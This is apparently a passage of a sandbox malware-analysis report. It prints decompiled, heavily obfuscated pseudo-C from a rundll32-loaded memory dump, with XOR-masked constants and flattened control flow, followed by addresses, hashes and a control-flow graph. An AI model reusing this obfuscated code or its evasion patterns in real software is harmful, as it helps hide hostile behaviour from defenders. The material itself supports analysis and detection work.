                                                                        				signed int _t914;
                                                                        				signed int _t926;
                                                                        				signed int _t928;
                                                                        				signed int _t930;
                                                                        				short* _t998;
                                                                        				short* _t999;
                                                                        				_t900 = 7;
                                                                        				 *(_t1012 + 0xb8) =  *(_t1012 + 0xbc) * 0x31;
                                                                        				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) + 0xb35c;
                                                                        				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) ^ 0x000cf45c;
                                                                        				 *(_t1012 + 0x64) = 0x7cb6;
                                                                        				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x88e3463d;
                                                                        				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) * 0x56;
                                                                        				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xf;
                                                                        				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0xd559658e;
                                                                        				 *(_t1012 + 0xac) = 0xf45a;
                                                                        				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) / _t900;
                                                                        				_t901 = 0x60;
                                                                        				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) * 0x3e;
                                                                        				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) ^ 0x000800e5;
                                                                        				 *(_t1012 + 0xe4) = 0xf8f;
                                                                        				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) >> 4;
                                                                        				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) ^ 0x0000477d;
                                                                        				 *(_t1012 + 0xdc) = 0xf07b;
                                                                        				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) >> 0xb;
                                                                        				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00007281;
                                                                        				 *(_t1012 + 0xd4) = 0xb5b1;
                                                                        				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 0xd;
                                                                        				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) + 0xffff2f0a;
                                                                        				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x16b57b93;
                                                                        				 *(_t1012 + 0x10c) = 0xd67e;
                                                                        				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b92c7;
                                                                        				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b23c9;
                                                                        				 *(_t1012 + 0xcc) = 0x2221;
                                                                        				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) << 2;
                                                                        				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) >> 6;
                                                                        				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) ^ 0x0000659f;
                                                                        				 *(_t1012 + 0x104) = 0x2a0b;
                                                                        				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) >> 4;
                                                                        				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x000066a5;
                                                                        				 *(_t1012 + 0xc8) = 0x810d;
                                                                        				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) / _t901;
                                                                        				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) << 0x10;
                                                                        				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) ^ 0x01580000;
                                                                        				_t902 =  *((intOrPtr*)(_t1012 + 0x158));
                                                                        				 *((intOrPtr*)(_t1012 + 0x14)) =  *((intOrPtr*)(_t1012 + 0x15c));
                                                                        				 *((intOrPtr*)(_t1012 + 0x154)) = _t902;
                                                                        				while(1) {
                                                                        					_t1015 = _t906 - 0x1e362325;
                                                                        					if(_t1015 > 0) {
                                                                        						goto L30;
                                                                        					}
                                                                        					L2:
                                                                        					if(_t1015 == 0) {
                                                                        						_push(_t906);
                                                                        						_t1001 = E1000ADBD( *((intOrPtr*)(_t997 + 4)));
                                                                        						_t902 = E100157E8(_t838);
                                                                        						 *((intOrPtr*)(_t1012 + 0x158)) = _t902;
                                                                        						__eflags = _t902;
                                                                        						if(__eflags != 0) {
                                                                        							_t823 = E1001BD4A( *(_t1012 + 0xc0),  *(_t1012 + 0x3c), __eflags, _t902,  *(_t1012 + 0xcc), _t1001,  *_t997,  *((intOrPtr*)(_t997 + 4)));
                                                                        							_t1012 = _t1012 + 0x14;
                                                                        							 *((intOrPtr*)(_t1012 + 0x14)) = _t823;
                                                                        							__eflags = _t823;
                                                                        							if(__eflags == 0) {
                                                                        								E100091CD( *(_t1012 + 0x90),  *((intOrPtr*)(_t1012 + 0x120)),  *(_t1012 + 0x84), _t902,  *(_t1012 + 0x74));
                                                                        							} else {
                                                                        								_t906 = 0x30070f42;
                                                                        								goto L13;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t1016 = _t906 - 0x12f44b45;
                                                                        						if(_t1016 > 0) {
                                                                        							__eflags = _t906 - 0x1993ee00;
                                                                        							if(_t906 == 0x1993ee00) {
                                                                        								_t926 = _t1012 + 0x17c;
                                                                        								E100106C2(_t926,  *(_t1012 + 0xb4),  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0x11c), _t1012 + 0x158);
                                                                        								_t1012 = _t1012 + 0xc;
                                                                        								asm("sbb ecx, ecx");
                                                                        								_t906 = (_t926 & 0x08d2d6d7) + 0x3077984c;
                                                                        								goto L10;
                                                                        							} else {
                                                                        								__eflags = _t906 - 0x1bb47d9a;
                                                                        								if(_t906 == 0x1bb47d9a) {
                                                                        									 *(_t1012 + 0x164) =  *(_t1012 + 0xc8);
                                                                        									 *(_t1012 + 0x168) =  *(_t1012 + 0x168) & 0x00000000;
                                                                        									_t928 =  *(_t1012 + 0x168);
                                                                        									E1000ADCE(_t928,  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xa4), _t1012 + 0x1a4,  *(_t1012 + 0x5c),  *(_t1012 + 0x128), _t1012 + 0x29c, _t1012 + 0x17c, _t1012 + 0x168,  *((intOrPtr*)(_t1012 + 0x140)),  *((intOrPtr*)(_t1012 + 0x16c)), _t1012 + 0x488);
                                                                        									_t1012 = _t1012 + 0x28;
                                                                        									asm("sbb ecx, ecx");
                                                                        									_t906 = (_t928 & 0x1b5b9d4f) + 0x12f44b45;
                                                                        									goto L10;
                                                                        								} else {
                                                                        									__eflags = _t906 - 0x1bef9ca6;
                                                                        									if(_t906 != 0x1bef9ca6) {
                                                                        										goto L44;
                                                                        									} else {
                                                                        										_t998 = _t1012 + 0x288;
                                                                        										_t930 = 6;
                                                                        										_t1010 =  *(_t1012 + 0x14c) % _t930 + 1;
                                                                        										__eflags = _t1010;
                                                                        										if(__eflags != 0) {
                                                                        											__eflags = 1;
                                                                        											do {
                                                                        												_t881 = 0xf;
                                                                        												_t1006 = ( *(_t1012 + 0x14c) & _t881) + 4;
                                                                        												E100060DA(_t1012 + 0x14c,  *(_t1012 + 0xe8), 1, _t1006,  *(_t1012 + 0x13c),  *(_t1012 + 0x108),  *(_t1012 + 0xa4), _t998);
                                                                        												_t1012 = _t1012 + 0x18;
                                                                        												_t999 = _t998 + _t1006 * 2;
                                                                        												_t883 = 0x2f;
                                                                        												 *_t999 = _t883;
                                                                        												_t998 = _t999 + 2;
                                                                        												_t1010 = _t1010 - 1;
                                                                        												__eflags = _t1010;
                                                                        											} while (__eflags != 0);
                                                                        											_t902 =  *((intOrPtr*)(_t1012 + 0x154));
                                                                        											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
                                                                        										}
                                                                        										_t1008 =  *((intOrPtr*)(_t1012 + 0x150));
                                                                        										 *_t998 = 0;
                                                                        										_t906 = 0x93c2f64;
                                                                        										_t823 =  *((intOrPtr*)(_t1012 + 0x14));
                                                                        										_t997 =  *((intOrPtr*)(_t1012 + 0xc90));
                                                                        										continue;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							if(_t1016 == 0) {
                                                                        								E100091CD( *(_t1012 + 0x6c),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0x130),  *((intOrPtr*)(_t1012 + 0x170)),  *((intOrPtr*)(_t1012 + 0x70)));
                                                                        								_t1012 = _t1012 + 0xc;
                                                                        								_t906 = 0x1ac68c4;
                                                                        								goto L10;
                                                                        							} else {
                                                                        								if(_t906 == 0x1ac68c4) {
                                                                        									E100091CD( *(_t1012 + 0x3c),  *(_t1012 + 0x104),  *(_t1012 + 0x128),  *((intOrPtr*)(_t1012 + 0x15c)),  *(_t1012 + 0xb8));
                                                                        									_t1012 = _t1012 + 0xc;
                                                                        									_t906 = 0x3077984c;
                                                                        									goto L10;
                                                                        								} else {
                                                                        									if(_t906 == 0x4136454) {
                                                                        										E100091CD( *(_t1012 + 0xa4),  *(_t1012 + 0xfc),  *(_t1012 + 0x124),  *(_t1012 + 0x164),  *(_t1012 + 0x58));
                                                                        										_t1012 = _t1012 + 0xc;
                                                                        										_t906 = 0x12f44b45;
                                                                        										goto L10;
                                                                        									} else {
                                                                        										if(_t906 == 0x599ba18) {
                                                                        											_push(0x100014d4);
                                                                        											_push( *(_t1012 + 0xc0));
                                                                        											E100164EC(_t1012 + 0x214, __eflags, E1001BF25( *(_t1012 + 0x28),  *(_t1012 + 0x58), __eflags),  *(_t1012 + 0x98), 0x400, _t1012 + 0x2a0, _t1012 + 0x198,  *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0xec),  *(_t1012 + 0x110));
                                                                        											E1001C5F7( *(_t1012 + 0x11c),  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x58),  *(_t1012 + 0xfc), _t861);
                                                                        											_t1012 = _t1012 + 0x34;
                                                                        											_t906 = 0x2dee6d8e;
                                                                        											L12:
                                                                        											_t823 =  *((intOrPtr*)(_t1012 + 0x14));
                                                                        											L13:
                                                                        											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
                                                                        											continue;
                                                                        										} else {
                                                                        											_t1020 = _t906 - 0x93c2f64;
                                                                        											if(_t906 != 0x93c2f64) {
                                                                        												L44:
                                                                        												__eflags = _t906 - 0x12d8e207;
                                                                        												if(__eflags != 0) {
                                                                        													continue;
                                                                        													do {
                                                                        														while(1) {
                                                                        															_t1015 = _t906 - 0x1e362325;
                                                                        															if(_t1015 > 0) {
                                                                        																goto L30;
                                                                        															}
                                                                        															goto L2;
                                                                        														}
                                                                        														goto L30;
                                                                        													} while (__eflags != 0);
                                                                        													goto L45;
                                                                        												} else {
                                                                        													L45:
                                                                        												}
                                                                        											} else {
                                                                        												E10005856(_t1012 + 0x208, _t997, _t1020);
                                                                        												_t906 = 0x599ba18;
                                                                        												L10:
                                                                        												_t823 =  *((intOrPtr*)(_t1012 + 0x14));
                                                                        												while(1) {
                                                                        													_t1015 = _t906 - 0x1e362325;
                                                                        													if(_t1015 > 0) {
                                                                        														goto L30;
                                                                        													}
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L47:
                                                                        					return _t1008;
                                                                        					L30:
                                                                        					__eflags = _t906 - 0x22fa333e;
                                                                        					if(_t906 == 0x22fa333e) {
                                                                        						E100091CD( *(_t1012 + 0xe0),  *((intOrPtr*)(_t1012 + 0x118)),  *(_t1012 + 0xd4), _t902,  *(_t1012 + 0x104));
                                                                        						_t823 =  *((intOrPtr*)(_t1012 + 0x20));
                                                                        						_t1012 = _t1012 + 0xc;
                                                                        						_t906 = 0x12d8e207;
                                                                        						goto L44;
                                                                        					} else {
                                                                        						__eflags = _t906 - 0x2a5de1a5;
                                                                        						if(_t906 == 0x2a5de1a5) {
                                                                        							 *(_t1012 + 0x14c) = E10017B6B();
                                                                        							_t906 = 0x1e362325;
                                                                        							goto L10;
                                                                        						} else {
                                                                        							__eflags = _t906 - 0x2dee6d8e;
                                                                        							if(_t906 == 0x2dee6d8e) {
                                                                        								E10011259(_t1012 + 0x15c, _t1012 + 0x20c, _t1012 + 0x16c);
                                                                        								_pop(_t909);
                                                                        								asm("sbb ecx, ecx");
                                                                        								_t906 = (_t909 & 0x1a0814d6) + 0x1ac68c4;
                                                                        								goto L10;
                                                                        							} else {
                                                                        								__eflags = _t906 - 0x2e4fe894;
                                                                        								if(_t906 == 0x2e4fe894) {
                                                                        									__eflags = E1000C07D( *((intOrPtr*)(_t1012 + 0xc98)), _t1012 + 0x164,  *(_t1012 + 0xf0),  *(_t1012 + 0x6c));
                                                                        									_t906 = 0x4136454;
                                                                        									_t831 = 1;
                                                                        									_t1008 =  !=  ? _t831 : _t1008;
                                                                        									 *((intOrPtr*)(_t1012 + 0x150)) = _t1008;
                                                                        									goto L10;
                                                                        								} else {
                                                                        									__eflags = _t906 - 0x30070f42;
                                                                        									if(_t906 == 0x30070f42) {
                                                                        										 *((intOrPtr*)(_t1012 + 0x188)) = _t823;
                                                                        										_t914 = _t1012 + 0x178;
                                                                        										 *((intOrPtr*)(_t1012 + 0x180)) = _t1002;
                                                                        										 *((intOrPtr*)(_t1012 + 0x18c)) = _t902;
                                                                        										E1000A83A(_t914,  *((intOrPtr*)(_t1012 + 0xd0)),  *(_t1012 + 0x90), _t1012 + 0x180,  *(_t1012 + 0xb4));
                                                                        										_t1012 = _t1012 + 0xc;
                                                                        										asm("sbb ecx, ecx");
                                                                        										_t906 = (_t914 & 0xf699bac2) + 0x22fa333e;
                                                                        										goto L10;
                                                                        									} else {
                                                                        										__eflags = _t906 - 0x3077984c;
                                                                        										if(_t906 == 0x3077984c) {
                                                                        											E100091CD( *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xb8),  *(_t1012 + 0xec),  *(_t1012 + 0x178),  *(_t1012 + 0xdc));
                                                                        											_t1012 = _t1012 + 0xc;
                                                                        											_t906 = 0x22fa333e;
                                                                        											goto L10;
                                                                        										} else {
                                                                        											__eflags = _t906 - 0x394a6f23;
                                                                        											if(__eflags != 0) {
                                                                        												goto L44;
                                                                        											} else {
                                                                        												_push(0x100014a4);
                                                                        												_push( *(_t1012 + 0x90));
                                                                        												E10003482( *(_t1012 + 0x6c), __eflags, ( *( *0x100221c0 + 0x18))[3] & 0x000000ff, _t1012 + 0x1b4,  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x14c),  *( *( *0x100221c0 + 0x18)) & 0x000000ff, ( *( *0x100221c0 + 0x18))[2] & 0x000000ff, 0x40, ( *( *0x100221c0 + 0x18))[1] & 0x000000ff, E1001BF25( *(_t1012 + 0x13c),  *(_t1012 + 0x9c), __eflags),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0xb0),  *(_t1012 + 0xa4));
                                                                        												E1001C5F7( *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0x98),  *((intOrPtr*)(_t1012 + 0x16c)),  *(_t1012 + 0x88), _t867);
                                                                        												_t1012 = _t1012 + 0x44;
                                                                        												_t906 = 0x1bef9ca6;
                                                                        												 *(_t1012 + 0x168) = ( *( *0x100221c0 + 0x18))[4] & 0x0000ffff;
                                                                        												goto L12;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L47;
                                                                        				}
                                                                        			}












































                                                                        0x10019e90
                                                                        0x10019e9b
                                                                        0x10019ea6
                                                                        0x10019eb1
                                                                        0x10019ebe
                                                                        0x10019ec2
                                                                        0x10019eca
                                                                        0x10019ed2
                                                                        0x10019eda
                                                                        0x10019ee5
                                                                        0x10019ef0
                                                                        0x10019ef7
                                                                        0x10019f02
                                                                        0x10019f0a
                                                                        0x10019f12
                                                                        0x10019f1a
                                                                        0x10019f22
                                                                        0x10019f2a
                                                                        0x10019f35
                                                                        0x10019f48
                                                                        0x10019f4f
                                                                        0x10019f5a
                                                                        0x10019f6d
                                                                        0x10019f74
                                                                        0x10019f7f
                                                                        0x10019f87
                                                                        0x10019f92
                                                                        0x10019f9d
                                                                        0x10019fa4
                                                                        0x10019faf
                                                                        0x10019fb7
                                                                        0x10019fbc
                                                                        0x10019fc4
                                                                        0x10019fcc
                                                                        0x10019fd4
                                                                        0x10019fdc
                                                                        0x10019fe1
                                                                        0x10019fe9
                                                                        0x10019ff1
                                                                        0x10019ff9
                                                                        0x1001a004
                                                                        0x1001a017
                                                                        0x1001a01e
                                                                        0x1001a029
                                                                        0x1001a036
                                                                        0x1001a041
                                                                        0x1001a049
                                                                        0x1001a054
                                                                        0x1001a05f
                                                                        0x1001a067
                                                                        0x1001a06f
                                                                        0x1001a07a
                                                                        0x1001a085
                                                                        0x1001a090
                                                                        0x1001a098
                                                                        0x1001a0a3
                                                                        0x1001a0b1
                                                                        0x1001a0b6
                                                                        0x1001a0bc
                                                                        0x1001a0c1
                                                                        0x1001a0c6
                                                                        0x1001a0ce
                                                                        0x1001a0d9
                                                                        0x1001a0e4
                                                                        0x1001a0ef
                                                                        0x1001a0fa
                                                                        0x1001a105
                                                                        0x1001a110
                                                                        0x1001a11b
                                                                        0x1001a126
                                                                        0x1001a131
                                                                        0x1001a13c
                                                                        0x1001a147
                                                                        0x1001a152
                                                                        0x1001a15d
                                                                        0x1001a168
                                                                        0x1001a174
                                                                        0x1001a179
                                                                        0x1001a17f
                                                                        0x1001a18c
                                                                        0x1001a18f
                                                                        0x1001a193
                                                                        0x1001a19b
                                                                        0x1001a1a3
                                                                        0x1001a1a8
                                                                        0x1001a1ad
                                                                        0x1001a1b5
                                                                        0x1001a1bd
                                                                        0x1001a1d3
                                                                        0x1001a1da
                                                                        0x1001a1e5
                                                                        0x1001a1f0
                                                                        0x1001a1f8
                                                                        0x1001a203
                                                                        0x1001a20b
                                                                        0x1001a213
                                                                        0x1001a21b
                                                                        0x1001a220
                                                                        0x1001a228
                                                                        0x1001a23b
                                                                        0x1001a23c
                                                                        0x1001a24b
                                                                        0x1001a252
                                                                        0x1001a25d
                                                                        0x1001a271
                                                                        0x1001a278
                                                                        0x1001a285
                                                                        0x1001a290
                                                                        0x1001a298
                                                                        0x1001a2a0
                                                                        0x1001a2a8
                                                                        0x1001a2ad
                                                                        0x1001a2b5
                                                                        0x1001a2bd
                                                                        0x1001a2cc
                                                                        0x1001a2cf
                                                                        0x1001a2d8
                                                                        0x1001a2dc
                                                                        0x1001a2e4
                                                                        0x1001a2ef
                                                                        0x1001a2f7
                                                                        0x1001a302
                                                                        0x1001a30f
                                                                        0x1001a313
                                                                        0x1001a318
                                                                        0x1001a320
                                                                        0x1001a328
                                                                        0x1001a33e
                                                                        0x1001a345
                                                                        0x1001a350
                                                                        0x1001a363
                                                                        0x1001a366
                                                                        0x1001a36d
                                                                        0x1001a378
                                                                        0x1001a383
                                                                        0x1001a38e
                                                                        0x1001a399
                                                                        0x1001a3a4
                                                                        0x1001a3ac
                                                                        0x1001a3b7
                                                                        0x1001a3c2
                                                                        0x1001a3ca
                                                                        0x1001a3da
                                                                        0x1001a3de
                                                                        0x1001a3e6
                                                                        0x1001a3ee
                                                                        0x1001a3f6
                                                                        0x1001a3fb
                                                                        0x1001a403
                                                                        0x1001a40b
                                                                        0x1001a413
                                                                        0x1001a425
                                                                        0x1001a428
                                                                        0x1001a42f
                                                                        0x1001a43a
                                                                        0x1001a445
                                                                        0x1001a452
                                                                        0x1001a456
                                                                        0x1001a45b
                                                                        0x1001a460
                                                                        0x1001a468
                                                                        0x1001a473
                                                                        0x1001a47e
                                                                        0x1001a486
                                                                        0x1001a491
                                                                        0x1001a49c
                                                                        0x1001a4a7
                                                                        0x1001a4b2
                                                                        0x1001a4bd
                                                                        0x1001a4c8
                                                                        0x1001a4d5
                                                                        0x1001a4e0
                                                                        0x1001a4e8
                                                                        0x1001a4f3
                                                                        0x1001a4fe
                                                                        0x1001a509
                                                                        0x1001a514
                                                                        0x1001a51c
                                                                        0x1001a52b
                                                                        0x1001a52e
                                                                        0x1001a53a
                                                                        0x1001a53e
                                                                        0x1001a546
                                                                        0x1001a551
                                                                        0x1001a560
                                                                        0x1001a565
                                                                        0x1001a56e
                                                                        0x1001a579
                                                                        0x1001a584
                                                                        0x1001a58f
                                                                        0x1001a59a
                                                                        0x1001a5a7
                                                                        0x1001a5a8
                                                                        0x1001a5ac
                                                                        0x1001a5b1
                                                                        0x1001a5b9
                                                                        0x1001a5c1
                                                                        0x1001a5cc
                                                                        0x1001a5d7
                                                                        0x1001a5e2
                                                                        0x1001a5ed
                                                                        0x1001a5f8
                                                                        0x1001a600
                                                                        0x1001a60d
                                                                        0x1001a611
                                                                        0x1001a619
                                                                        0x1001a621
                                                                        0x1001a62c
                                                                        0x1001a637
                                                                        0x1001a642
                                                                        0x1001a64d
                                                                        0x1001a658
                                                                        0x1001a663
                                                                        0x1001a66e
                                                                        0x1001a676
                                                                        0x1001a681
                                                                        0x1001a689
                                                                        0x1001a696
                                                                        0x1001a69a
                                                                        0x1001a69f
                                                                        0x1001a6a7
                                                                        0x1001a6ba
                                                                        0x1001a6c1
                                                                        0x1001a6cc
                                                                        0x1001a6d7
                                                                        0x1001a6e2
                                                                        0x1001a6ea
                                                                        0x1001a6f5
                                                                        0x1001a708
                                                                        0x1001a70f
                                                                        0x1001a71a
                                                                        0x1001a728
                                                                        0x1001a734
                                                                        0x1001a739
                                                                        0x1001a73f
                                                                        0x1001a747
                                                                        0x1001a74f
                                                                        0x1001a757
                                                                        0x1001a75f
                                                                        0x1001a764
                                                                        0x1001a769
                                                                        0x1001a771
                                                                        0x1001a77d
                                                                        0x1001a782
                                                                        0x1001a78c
                                                                        0x1001a791
                                                                        0x1001a79b
                                                                        0x1001a7a0
                                                                        0x1001a7a6
                                                                        0x1001a7ae
                                                                        0x1001a7b9
                                                                        0x1001a7c4
                                                                        0x1001a7cf
                                                                        0x1001a7db
                                                                        0x1001a7e0
                                                                        0x1001a7eb
                                                                        0x1001a7ee
                                                                        0x1001a7f2
                                                                        0x1001a7fa
                                                                        0x1001a802
                                                                        0x1001a80a
                                                                        0x1001a80f
                                                                        0x1001a817
                                                                        0x1001a81c
                                                                        0x1001a824
                                                                        0x1001a83a
                                                                        0x1001a841
                                                                        0x1001a84c
                                                                        0x1001a857
                                                                        0x1001a862
                                                                        0x1001a86d
                                                                        0x1001a880
                                                                        0x1001a881
                                                                        0x1001a888
                                                                        0x1001a893
                                                                        0x1001a89e
                                                                        0x1001a8a6
                                                                        0x1001a8b3
                                                                        0x1001a8b7
                                                                        0x1001a8bc
                                                                        0x1001a8c4
                                                                        0x1001a8d8
                                                                        0x1001a8eb
                                                                        0x1001a8ec
                                                                        0x1001a8f3
                                                                        0x1001a8fe
                                                                        0x1001a909
                                                                        0x1001a911
                                                                        0x1001a91c
                                                                        0x1001a927
                                                                        0x1001a92f
                                                                        0x1001a93a
                                                                        0x1001a945
                                                                        0x1001a94d
                                                                        0x1001a958
                                                                        0x1001a963
                                                                        0x1001a96e
                                                                        0x1001a979
                                                                        0x1001a984
                                                                        0x1001a98f
                                                                        0x1001a997
                                                                        0x1001a99f
                                                                        0x1001a9aa
                                                                        0x1001a9b5
                                                                        0x1001a9bd
                                                                        0x1001a9c8
                                                                        0x1001a9dc
                                                                        0x1001a9e3
                                                                        0x1001a9eb
                                                                        0x1001a9fd
                                                                        0x1001aa04
                                                                        0x1001aa08
                                                                        0x1001aa0f
                                                                        0x1001aa0f
                                                                        0x1001aa15
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001aa1b
                                                                        0x1001aa1b
                                                                        0x1001ad25
                                                                        0x1001ad2e
                                                                        0x1001ad42
                                                                        0x1001ad44
                                                                        0x1001ad4c
                                                                        0x1001ad4e
                                                                        0x1001ad6d
                                                                        0x1001ad72
                                                                        0x1001ad75
                                                                        0x1001ad79
                                                                        0x1001ad7b
                                                                        0x1001b009
                                                                        0x1001ad81
                                                                        0x1001ad81
                                                                        0x00000000
                                                                        0x1001ad81
                                                                        0x1001ad7b

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /$ $!"$"s$#oJ9$)?$.v$15$2b$8$;d$DM$De$H{$b-$d/<$d/<$dg$l8$m$}&$}G$}$%
                                                                        • API String ID: 0-2457962065
                                                                        • Opcode ID: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
                                                                        • Instruction ID: 976f8a73325060f499c1b6153de22724aa2fccf811286313bd7587404af29fef
                                                                        • Opcode Fuzzy Hash: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
                                                                        • Instruction Fuzzy Hash: 6292F2715093818FE378CF61C989B9BBBE1FBC5744F10891DE18A8A260D7B59989CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 541 10012965-10013287 call 100145f8 544 1001328e 541->544 545 10013293-10013299 544->545 546 10013460-10013466 545->546 547 1001329f 545->547 548 100135fc-10013623 call 100091cd 546->548 549 1001346c-10013472 546->549 550 100132a5-100132ab 547->550 551 10013418-1001345b call 1000d0de 547->551 573 10013628-1001362e 548->573 553 100135c3-100135f7 call 10011b71 549->553 554 10013478-1001347a 549->554 555 100132b1-100132b7 550->555 556 10013636-10013648 550->556 551->545 553->544 560 10013480-10013486 554->560 561 1001353c-100135be call 1001bf25 call 100164ec call 1001c5f7 554->561 562 100133e9-10013413 call 100078f0 555->562 563 100132bd-100132c3 555->563 559 1001364e-10013658 556->559 567 10013513-10013537 call 100091cd 560->567 568 1001348c-10013492 560->568 561->544 562->544 569 100132c9-100132cf 563->569 570 100133bd-100133e4 call 100091cd 563->570 567->544 568->573 575 10013498-1001350e call 10009295 call 1001bbab call 1001c353 568->575 576 100132d5-100132db 569->576 577 1001335e-1001337a call 100157e8 569->577 570->544 573->545 581 10013634 573->581 599 10013353-10013359 575->599 586 10013327-1001334d call 10002628 576->586 587 100132dd-100132e3 576->587 577->559 596 10013380-100133b8 call 10001d54 577->596 581->559 586->599 587->573 593 100132e9-10013322 call 100189f6 587->593 593->544 596->544 599->544
                                                                        C-Code - Quality: 94%
                                                                        			E10012965(intOrPtr __ecx, signed int __edx) {
                                                                        				char _v524;
                                                                        				char _v1044;
                                                                        				char _v1564;
                                                                        				intOrPtr _v1568;
                                                                        				intOrPtr _v1572;
                                                                        				signed int _v1576;
                                                                        				intOrPtr _v1580;
                                                                        				char _v1584;
                                                                        				intOrPtr _v1588;
                                                                        				signed int _v1592;
                                                                        				signed int _v1596;
                                                                        				signed int _v1600;
                                                                        				signed int _v1604;
                                                                        				signed int _v1608;
                                                                        				signed int _v1612;
                                                                        				signed int _v1616;
                                                                        				signed int _v1620;
                                                                        				signed int _v1624;
                                                                        				signed int _v1628;
                                                                        				signed int _v1632;
                                                                        				signed int _v1636;
                                                                        				signed int _v1640;
                                                                        				signed int _v1644;
                                                                        				signed int _v1648;
                                                                        				signed int _v1652;
                                                                        				signed int _v1656;
                                                                        				signed int _v1660;
                                                                        				signed int _v1664;
                                                                        				signed int _v1668;
                                                                        				signed int _v1672;
                                                                        				signed int _v1676;
                                                                        				signed int _v1680;
                                                                        				signed int _v1684;
                                                                        				signed int _v1688;
                                                                        				signed int _v1692;
                                                                        				signed int _v1696;
                                                                        				signed int _v1700;
                                                                        				signed int _v1704;
                                                                        				signed int _v1708;
                                                                        				signed int _v1712;
                                                                        				signed int _v1716;
                                                                        				signed int _v1720;
                                                                        				signed int _v1724;
                                                                        				signed int _v1728;
                                                                        				signed int _v1732;
                                                                        				signed int _v1736;
                                                                        				signed int _v1740;
                                                                        				signed int _v1744;
                                                                        				signed int _v1748;
                                                                        				signed int _v1752;
                                                                        				signed int _v1756;
                                                                        				signed int _v1760;
                                                                        				signed int _v1764;
                                                                        				signed int _v1768;
                                                                        				signed int _v1772;
                                                                        				signed int _v1776;
                                                                        				signed int _v1780;
                                                                        				signed int _v1784;
                                                                        				signed int _v1788;
                                                                        				signed int _v1792;
                                                                        				signed int _v1796;
                                                                        				signed int _v1800;
                                                                        				signed int _v1804;
                                                                        				signed int _v1808;
                                                                        				signed int _v1812;
                                                                        				signed int _v1816;
                                                                        				signed int _v1820;
                                                                        				signed int _v1824;
                                                                        				void* _t616;
                                                                        				void* _t617;
                                                                        				signed int _t631;
                                                                        				signed int _t636;
                                                                        				signed int _t638;
                                                                        				signed int _t643;
                                                                        				signed int _t653;
                                                                        				signed int _t654;
                                                                        				signed int _t655;
                                                                        				signed int _t656;
                                                                        				signed int _t657;
                                                                        				signed int _t658;
                                                                        				signed int _t659;
                                                                        				signed int _t660;
                                                                        				signed int _t661;
                                                                        				signed int _t662;
                                                                        				signed int _t663;
                                                                        				signed int _t664;
                                                                        				signed int _t665;
                                                                        				signed int _t675;
                                                                        				void* _t676;
                                                                        				void* _t681;
                                                                        				signed int _t731;
                                                                        				signed int _t732;
                                                                        				signed int _t733;
                                                                        				signed int _t734;
                                                                        				signed int _t737;
                                                                        				void* _t739;
                                                                        				void* _t740;
                                                                        				void* _t742;
                                                                        
                                                                        				_v1592 = __edx;
                                                                        				_v1588 = __ecx;
                                                                        				_v1600 = 0x81a2;
                                                                        				_v1600 = _v1600 * 0x51;
                                                                        				_t734 = 0x149dffe6;
                                                                        				_v1600 = _v1600 ^ 0x0029046b;
                                                                        				_v1820 = 0xa317;
                                                                        				_t731 = 0x6d;
                                                                        				_v1820 = _v1820 / _t731;
                                                                        				_v1820 = _v1820 | 0xb0bf28c0;
                                                                        				_v1820 = _v1820 << 8;
